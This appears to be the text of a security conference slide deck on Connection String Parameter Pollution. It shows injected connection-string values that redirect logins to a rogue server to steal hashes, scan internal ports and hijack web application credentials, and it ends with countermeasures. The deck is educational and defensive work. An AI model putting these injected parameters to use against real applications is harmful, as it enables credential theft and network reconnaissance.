8. HowWebappconnectsto DB OperatingSystemAccounts DatabaseCredentials Data Source = myServerAddress; InitialCatalog = myDataBase; User Id =; Password =; Integrated Security = SSPI/True/Yes; Data Source = myServerAddress; InitialCatalog = myDataBase; User Id = myUsername; Password = myPassword; Integrated Security = No;
9. Usersauthenticatedby Web App Web applicationmanagestheloginprocess Syslogins 1.- Web applicatonconnectsusingitscredentialstothedatabase. 2.- Asksuserlogininformation. 3.- Checkslogininformationaboutinfostored in customuserstable. Connectionstring Customuserstable Select id fromusers DatabaseEngine Apprunningon Web Server
10. UsersautheticatedbyDatabase Databaseenginemanagestheloginprocess 1.- Web applicationasksforcredentials. 2.- A connectionstringiscomposedwiththecredentialstoconnecttothedatabase. 3.- Roles and permits are limitedbytheuserused in theconnectionstring Syslogins Connectionstring DatabaseEngine Apprunningon Web Server
14. ConnectionStringParameterPollution The goal is to inject parameters in the connection string, whether they exist or not Had duplicated a parameter, the last value wins This behavior allows attackers to overwrite completely the connection string, therefore to manipulate the way the application will work and how should be the it authenticated
16. What can be done with CSPP?Overwrite a parameter Data Source=DB1 UID=sa Data Source=DB2 password=Pwnd! DBConnectionObject DataSource UID password
17. Scanningthe DMZ DevelopmentDatabase 1 FinnacialDatabase Test Database ForgottenDatabase Internet FW Web app vulnerable to CSPP ProductionDatabase Data Source
18. Port Scanning a Server ProductionDatabase Server FW DataSource DB1,80 Internet Web app vulnerable to CSPP DB1,21 DB1,25 DB1,1445
19. What can be done with CSPP?Add a parameter Data Source=DB1 UID=sa Integrated Security=True password=Pwnd! DBConnectionObject DataSource UID password
20. CSPP Attack 1: Hash stealing 1.- Run a Rogue Server onanaccessible IP address: Rogue_Server 2.- Activate a snifferto catch theloginprocess Cain/Wireshark 3.- Overwrite Data Sourceparameter Data_Source=Rogue_Server 4.- Force Windows IntegratedAuthentication Integrated Security=true
21. CSPP Attack 1: Hash stealing Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+’User_Value’+; Password=+’Password_Value’+; Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=;Data Source=Rogue_Server; Password=;Integrated Security=True;
23. CSPP Attack 2: Port Scanning 1.- Duplicatethe Data Sourceparametersettingthe Target server and target porttobescanned. Data_Source=Target_Server,target_Port 2.- Checkthe error messages: - No TCP Connection -> Port isclosed - No SQL Server -> Port is open - InvalidPassword -> SQL Server there!
24. CSPP Attack 2: Port Scanning Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+’User_Value’+; Password=+’Password_Value’+; Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id= ;Data Source=Target_Server, Target_Port; Password=;Integrated Security=True;
27. CSPP Attack 3: Hijacking Web Credentials 1.- Duplicate Data Sourceparametertothe target SQL Server Data_Source=Target_Server 2.- Force Windows Authentication Integrated Security=true 3.- Application pool in whichthe web appisrunningonwillsenditscredentials in orderto log in tothedatabaseengine.
28. CSPP Attack 3: Hijacking Web Credentials Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=+’User_Value’+; Password=+’Password_Value’+; Data source = SQL2005; initial catalog = db1; Integrated Security=no; user id=;Data Source=Target_Server; Password=;Integrated Security=true;
32. OtherDatabases MySQL Does not support Integrated security It´s possible to manipulate the behavior of the web application, although Port Scanning Connect to internal/testing/for developing Databases Steal credentials Oracle supports integrated authority running on Windows and UNIX/Linux servers It´s possible to perform all described attacks Hash stealing Port Scanning Hijacking Web credentials Also it´s possible to elevate a connection to sysdba in order to shutdown/startup an instance
34. Scanner Proof of concept to test yournetwork Try a hijacking web credentialsattack Written in ASP.NET C# Free download (codeinclude of course) http://www.informatica64.com/csppScanner.aspx
39. ASP.NET Enterprise Manager ASP.NET Enterprise Manager is “abandoned”, but it´s still been used in a lot of web Control Panels. Fix the code yourself
40. ASP.NET Enterprise Manager ASP.NET Enterprise Manager is “abandoned”, but it´s still been used in a lot of web Control Panels. Fix the code yourself
41. ASP.NET Web Data Admistrator ASP Web Data Administratorissecure in CodePlex web site, butnot in Microsoft web sitewhereanunsecureoldversioniswaspublished
42. Countermeasures Hardenyour firewall Outboundconnections Reviewyourinternalaccountspolicy Web application Web server DatabaseEngine Use ConnectionStringBuilder Filterthe;)
43. Questions? Contacto Chema Alonso chema@informatica64.com http://www.informatica64.com http://elladodelmal.blogspot.com http://twitter.com/chemaalonso José Palazón “Palako” palako@lateatral.com Authors Chema Alonso Manuel Fernández “The Sur” Alejandro Martín Bailón Antonio Guzmán